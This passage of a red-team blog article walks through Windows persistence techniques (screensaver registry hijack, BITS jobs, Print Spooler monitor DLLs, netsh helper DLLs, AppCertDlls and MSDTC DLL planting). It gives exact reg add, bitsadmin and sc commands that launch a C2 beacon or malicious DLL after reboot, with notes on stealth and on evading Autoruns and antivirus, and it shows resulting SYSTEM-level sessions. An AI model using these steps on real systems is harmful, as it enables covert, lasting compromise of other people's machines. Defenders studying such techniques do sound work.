&lt;pre class="highlight plaintext"&gt;&lt;code&gt;HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Write directly to the registry:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;SCRNSAVE&lt;/span&gt;&lt;span class="err"&gt;.EXE&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\Users\hunter\Desktop\beacon.exe &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaveActive&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaverIsSecure&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaveTimeOut&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;60&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Examining the process tree shows it is spawned by &lt;code&gt;winlogon.exe&lt;/code&gt; – stealth is moderate:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" alt=" " width="181" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A minor pitfall: if a screen saver has never been configured, all keys except &lt;code&gt;ScreenSaveActive&lt;/code&gt; (which defaults to 1) do not exist. Proper screen saver operation requires all keys to hold data; therefore, all four must be rewritten. Additionally, testing shows the shortest trigger time is 60 seconds – even if a smaller value is set, the programme still executes after 60 seconds.&lt;br&gt;&lt;br&gt;
Naturally, as indicated by the registry path, this method yields a shell with only current‑user privileges. Its advantage is that it does not require elevation.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x07 Background Intelligent Transfer Service (BITS)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator rights (UAC bypass allowed).&lt;br&gt;&lt;br&gt;
The Background Intelligent Transfer Service (BITS) facilitates the transfer of large amounts of data without degrading network performance. It accomplishes this by transferring data in small blocks, utilising available idle bandwidth, and reassembling the data at the destination. BITS is supported on Microsoft® Windows Server 2003 family operating systems and Microsoft® Windows 2000. (Source: Baidu Baike)&lt;br&gt;&lt;br&gt;
Many online "penetration testing tutorials" include using the &lt;code&gt;bitsadmin&lt;/code&gt; command to download files or execute commands, but it can also be employed for persistence and can evade detection by Autoruns and anti‑virus protection against auto‑start command execution.&lt;br&gt;&lt;br&gt;
Adding a task is straightforward, requiring only four commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/create &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/addfile &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin.exe&lt;/span&gt; &lt;span class="na"&gt;/SetNotifyCmdLine &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt; &lt;span class="kd"&gt;NUL&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/Resume &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One advantage is that it can be executed within a reduced administrator session (bypassing UAC), and naturally the resulting beacon also operates with reduced privileges:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" alt=" " width="800" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After a reboot, since the task has not been completed, the system will re‑launch it, thus achieving persistence. Although BITS tasks have a default lifetime of 90 days—after which they are automatically cancelled—this is sufficient for red team operations:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" alt=" " width="800" height="678"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree, it is launched by &lt;code&gt;svchost.exe -k netsvcs&lt;/code&gt;. However, because it remains an independent process, stealth is moderate:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" alt=" " width="800" height="823"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This method bypasses all current startup inspection tools; the only means of detection is through the &lt;code&gt;bitsadmin&lt;/code&gt; command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;All tasks are displayed as shown (screenshot from a different test machine, hence data differs):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" alt=" " width="645" height="591"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x07 Print Spooler Service
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
The Print Spooler service manages print jobs in the Windows operating system. Because many users still rely on printers, optimisation software does not recommend disabling this service. The Print Spooler API includes a function, &lt;code&gt;AddMonitor&lt;/code&gt;, which installs a local port monitor and links configuration, data, and monitor files. This function injects a DLL into the &lt;code&gt;spoolsv.exe&lt;/code&gt; process to implement the desired functionality. The DLLs required by the system in its default state are as follows:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" alt=" " width="632" height="56"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" alt=" " width="666" height="62"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" alt=" " width="654" height="58"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" alt=" " width="676" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" alt=" " width="666" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These DLLs contain print‑driver‑related content. We can exploit this mechanism to plant a malicious DLL. Of course, as with service registration, this requires full administrator privileges.&lt;br&gt;&lt;br&gt;
First, place the malicious DLL in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" alt=" " width="800" height="377"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then execute the command to add the relevant registry entry and the Driver key:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;reg add "hklm\system\currentcontrolset\control\print\monitors\monitor" /v "Driver" /d "monitor.dll" /t REG_SZ&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" alt=" " width="800" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After reboot, the malicious DLL is automatically loaded into &lt;code&gt;spoolsv.exe&lt;/code&gt;, offering high stealth:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" alt=" " width="800" height="676"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The C2 session is established with SYSTEM privileges (MSF is used here for demonstration; a CS DLL would need to be rewritten):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" alt=" " width="800" height="234"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  0x08 Netsh
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
Netsh is a native Windows command‑line tool for network configuration. It can import helper DLLs to extend functionality, and once imported, the DLL path is stored in the registry for permanent effect:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" alt=" " width="799" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thus, persistence can be achieved by importing a helper DLL. The command format is:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;netsh add helper [Absolute evil DLL path]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;However, because netsh does not start automatically, an auto‑start entry must be added as well:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After reboot, the shell is still obtained:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" alt=" " width="798" height="228"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The process tree and loaded malicious module are shown below; stealth is relatively high:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the testing still relied on an MSF‑generated DLL, launching netsh pops up a console window and blocks; terminating the netsh process drops the connection. Therefore, for practical red‑team use, a custom DLL must be developed.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x09 AppCertDlls
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
It is well known that the &lt;code&gt;AppInit_DLLs&lt;/code&gt; registry value is read when &lt;code&gt;user32.dll&lt;/code&gt; is loaded into memory; if a value exists, &lt;code&gt;LoadLibrary()&lt;/code&gt; is called to load the user‑mode DLL. In earlier years, this method was quite popular for DLL‑injection persistence, but it has become ineffective on many modern systems. The reason is a flag check in &lt;code&gt;kernel32.dll&lt;/code&gt; during startup, as illustrated:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" alt=" " width="660" height="196"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;kernel32.dll&lt;/code&gt; queries class &lt;code&gt;0x67&lt;/code&gt; via &lt;code&gt;NtQuerySystemInformation&lt;/code&gt; and then checks whether the &lt;code&gt;ReturnLength&lt;/code&gt; is equal to 2 (bitwise AND operation). If equal, it skips loading the DLL and returns.&lt;br&gt;&lt;br&gt;
Information regarding &lt;code&gt;0x67&lt;/code&gt; can be found online:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" alt=" " width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This flag is toggled by &lt;code&gt;bcdedit.exe /set testsigning on/off&lt;/code&gt;. However, most recent machines have Secure Boot enabled in the BIOS by default; unless this option is disabled, the flag cannot be modified. Consequently, this method currently faces considerable limitations.&lt;br&gt;&lt;br&gt;
Nevertheless, there exists another, less commonly used registry key that also permits automatic DLL loading: &lt;code&gt;AppCertDlls&lt;/code&gt;. When a process invokes APIs such as &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;, the DLLs listed in this key are automatically loaded. Fortunately, many programmes call these APIs.&lt;br&gt;&lt;br&gt;
A test programme calling one of these APIs:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" alt=" " width="779" height="680"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Execution:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" alt=" " width="519" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;MSF session established:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" alt=" " width="800" height="115"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" alt=" " width="799" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It merely spawns a &lt;code&gt;rundll32.exe&lt;/code&gt; under a legitimate process, loading the malicious DLL. Stealth is high.&lt;br&gt;&lt;br&gt;
However, the MSF DLL remains usable only for testing. Because many system programmes call these APIs (e.g. &lt;code&gt;explorer.exe&lt;/code&gt;), and the MSF DLL blocks the process, it can prevent the desktop from loading at startup. Therefore, a custom DLL must be developed for operational use.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x0A MSDTC
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
&lt;code&gt;msdtc.exe&lt;/code&gt; is the Microsoft Distributed Transaction Coordinator. This process is invoked by Microsoft Personal Web Server and Microsoft SQL Server, and it manages multiple servers.&lt;br&gt;&lt;br&gt;
Upon startup, the service attempts to load three DLL files from &lt;code&gt;System32&lt;/code&gt;: &lt;code&gt;oci.dll&lt;/code&gt;, &lt;code&gt;SQLLib80.dll&lt;/code&gt;, and &lt;code&gt;xa80.dll&lt;/code&gt;. The service entry is shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The corresponding registry entries:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" alt=" " width="800" height="348"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In a default Windows installation, the file &lt;code&gt;oci.dll&lt;/code&gt; is missing from the &lt;code&gt;System32&lt;/code&gt; folder. Provided write access exists, a malicious DLL with that name can be placed there, and malicious code will execute when the service starts.&lt;br&gt;&lt;br&gt;
By default, the startup type is set to "Manual". Configure automatic startup with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;qc&lt;/span&gt; &lt;span class="kd"&gt;msdtc&lt;/span&gt;
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;config&lt;/span&gt; &lt;span class="kd"&gt;msdtc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The malicious DLL will be loaded into the &lt;code&gt;msdtc.exe&lt;/code&gt; process, yielding high stealth:&lt;/p&gt;

